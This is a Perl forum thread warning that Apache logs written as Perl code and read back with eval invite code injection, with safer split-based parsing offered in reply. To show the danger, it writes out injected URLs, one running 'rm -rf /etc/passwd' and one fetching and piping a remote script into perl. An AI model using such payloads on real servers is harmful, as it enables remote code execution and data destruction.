in reply to Perl readable Weblogs

Cool idea. Very dangerous, though. Your choice of delimiter is not safe (and I don't think there is a safe one). Apache writes anything you type in the URL straight through to the log. So requesting the URL:

http://www.victim.com/trick'); system('rm -rf /etc/passwd'); ('

would be logged as:

(bytes=>'0',...,url=>'trick'); system('rm -rf /etc/passwd'); ('', ...)

Which I don't want someone to be able to run on my server.
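To see the injection happen without damaging anything, here is a minimal sketch. It assumes a log line shaped like the one above (a Perl list literal with the URL pasted between single quotes); the `log_line` helper and the `$pwned` flag are hypothetical, and the payload only sets that flag instead of calling `system`.

```perl
use strict;
use warnings;

# Hypothetical log template in the style shown above: the URL is pasted
# verbatim between single quotes inside a Perl list literal.
sub log_line {
    my ($bytes, $url) = @_;
    return "(bytes=>'$bytes',url=>'$url')";
}

our $pwned = 0;

# Harmless stand-in for system('rm ...'): the payload only sets a flag.
my $evil_url = q{trick'); $main::pwned = 1; ('};
my $line = log_line(0, $evil_url);
print "$line\n";    # prints (bytes=>'0',url=>'trick'); $main::pwned = 1; ('')

# "Reading" the log line back with eval runs the injected statement.
{
    no warnings;    # silence "useless use of a constant" noise
    eval $line;
}
die $@ if $@;
print "pwned=$pwned\n";    # prints "pwned=1"
```

The quote in the URL closes the string early, so everything after it is compiled as ordinary Perl by whoever evals the log.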

From my brief reading of the BNF for valid URLs, there are some characters that are not allowed in URLs, such as ~, but Apache still writes whatever it was given to the access log.

Also, I doubt it is faster to eval each line of the log than to use a log format that can simply be split. I bet a regular expression match is faster than the eval, and it is certainly safer.
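If you want to check the speed claim yourself, a rough sketch with the core Benchmark module could look like this. The two sample lines and the three-field layout are made up for illustration, and no particular result is implied; the numbers will vary by machine and Perl version.

```perl
use strict;
use warnings;
use Benchmark qw(cmpthese);

# Hypothetical sample: the same request written in both log styles.
my $eval_line  = q{(bytes=>'512',status=>'200',url=>'/index.html')};
my $split_line = q{512|200|/index.html};

# Parse by running the line as Perl code (what the eval approach does).
sub parse_eval {
    my %h = eval $_[0];
    die $@ if $@;
    return \%h;
}

# Parse with a regex; (.*) at the end lets the URL keep any '|' it contains.
sub parse_regex {
    my %h;
    @h{qw(bytes status url)} = $_[0] =~ /^([^|]*)\|([^|]*)\|(.*)$/
        or return;
    return \%h;
}

# Both parsers should agree before timing them.
my ($e, $r) = (parse_eval($eval_line), parse_regex($split_line));
die "parsers disagree\n" if join(',', @$e{qw(bytes status url)})
                         ne join(',', @$r{qw(bytes status url)});

# Run each for at least one CPU second and print a comparison table.
cmpthese(-1, {
    eval  => sub { parse_eval($eval_line) },
    regex => sub { parse_regex($split_line) },
});
```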

If you do decide to go with the split idea, the following might work. Again you have to choose a good delimiter, but putting the URL at the end means you can leave it out of that choice: give split a field limit and any delimiter characters inside the URL stay in the last field. (Although %r is the whole request line, e.g. GET /index.html HTTP/1.0, so it contains the URL as well, and my choice of | as a delimiter may not be safe there either.)

LogFormat "%b|%f|%h|%a|%l|%p|%P|%r|%s|%t|%T|%u|%v|%U" log_perl

Then to read:

while (<LOGFILE>) {
    chomp;
    my %hash;
    # Hash slice; a limit of 14 (one per field) keeps any '|' in the trailing URL
    @hash{qw(bytes filename remotehost remoteip remoteuser serverport pid
             request status time timeserve authuser virtual url)} = split /\|/, $_, 14;
    # Use %hash
}
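The field limit is what makes "URL last" work. Here is a small sketch of the effect, using a hypothetical trimmed-down format (`%b|%h|%s|%U`) in which no earlier field repeats the URL; in the full format above, %r would still carry the URL and could still contain a `|`. The `parse_log_line` helper is illustrative only.

```perl
use strict;
use warnings;

# Hypothetical, trimmed-down format: LogFormat "%b|%h|%s|%U" log_perl
# (url last; none of the earlier fields repeat the URL).
my @fields = qw(bytes remotehost status url);

sub parse_log_line {
    my ($line) = @_;
    chomp $line;
    my %hash;
    # LIMIT = number of fields: the last piece keeps everything after the
    # third '|', including any '|' that appeared in the URL.
    @hash{@fields} = split /\|/, $line, scalar @fields;
    return \%hash;
}

my $rec = parse_log_line("512|10.0.0.1|200|/cgi-bin/q?a|b\n");
print "$rec->{url}\n";    # prints "/cgi-bin/q?a|b"

# Without the limit the URL is cut at its first '|' and the rest is lost:
my %naive;
@naive{@fields} = split /\|/, "512|10.0.0.1|200|/cgi-bin/q?a|b";
print "$naive{url}\n";    # prints "/cgi-bin/q?a"
```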

-ben

Re^2: Perl readable Weblogs
by tadman (Prior) on Apr 19, 2001 at 01:22 UTC
    Although it is unlikely that the Apache user 'nobody' can delete /etc/passwd (given only as an example, of course), there are far more evil things it can do, especially on e-commerce sites.

    Considering how much you can do with one line:

        ...'); system('lynx --source http://www.hax.it/script.pl|perl'); ('

    you would be well advised to use a simple delimiter that doesn't require eval.
Re: Re: Perl readable Weblogs
by mr.nick (Chaplain) on Apr 19, 2001 at 21:24 UTC
    Ouch! I never thought of the eval issues (though I suppose Safe would help). Unfortunately, having to know the field names beforehand goes against the intent. HOWEVER, the following should work well:

        LogFormat "bytes|%b|filename|%f|remotehost|%h|remoteip|%a|remoteuser|%l|serverport|%p|pid|%P|request|%r|status|%s|time|%t|timeserve|%T|authuser|%u|url|%U|virtual|%v" log_perl

    then parsing it with:

        while (<LOGFILE>) {
            chomp;                     # otherwise the last value keeps its newline
            my %hash = split /\|/, $_;
            ## do something with %hash, e.g. $hash{time} or $hash{bytes}
        }

    That should eliminate the nasty stuff.
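    A quick sketch of the name/value parse, with hypothetical lines trimmed to three fields (url not last, as in the format above). It also shows the weak spot: a single | in the URL shifts every later pair, and Perl warns about an odd number of elements in the hash assignment.

```perl
use strict;
use warnings;

# Parse a "name|value|name|value..." line into a hash.
sub parse_pairs {
    my ($line) = @_;
    chomp $line;
    my %hash = split /\|/, $line;
    return \%hash;
}

# Hypothetical lines in the self-describing format (trimmed to three fields).
my $ok = parse_pairs("bytes|512|status|200|url|/index.html\n");
print "$ok->{url}\n";    # prints "/index.html"

# One '|' in the URL shifts every later name/value pair
# (and triggers an "Odd number of elements" warning).
my $bad = parse_pairs("bytes|512|url|/q?a|b|status|200\n");
print exists $bad->{status} ? "status found\n" : "status is missing\n";
```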

      Hmm, you still get hit with the escaping problem: since you don't know how many |s to split on, you have to pick something that is not going to be in the URL. I would put the url at the end anyway, so that if someone got odd characters into the log, a split with a field limit would keep them inside the url value. Your new approach is certainly safer, since you won't get bitten by evaled code.
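      A sketch of that suggestion, assuming url is moved to the end of the name/value format and the parser knows the field count (here a hypothetical three-field format, `bytes|%b|status|%s|url|%U`). Splitting into 2 × fields pieces keeps any | inside the final url value.

```perl
use strict;
use warnings;

# Assumed field count for a self-describing "name|value|..." line with url
# moved to the end, e.g. (trimmed to three fields):
#   LogFormat "bytes|%b|status|%s|url|%U" log_perl
my $nfields = 3;

sub parse_pairs_url_last {
    my ($line) = @_;
    chomp $line;
    # 2 * $nfields pieces: every name and value, with the final value (url)
    # keeping any '|' characters it contains.
    my %hash = split /\|/, $line, 2 * $nfields;
    return \%hash;
}

my $rec = parse_pairs_url_last("bytes|512|status|200|url|/q?a|b\n");
print "$rec->{url}\n";      # prints "/q?a|b"
print "$rec->{status}\n";   # prints "200"
```

      The catch is that the parser has to know the field count, which gives back a little of the flexibility mr.nick was after, and it only protects the last field.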

      As an aside, someone else noted that you couldn't remove /etc/passwd as nobody, but remember this is a log analysis tool that will be run by some user periodically.

      -ben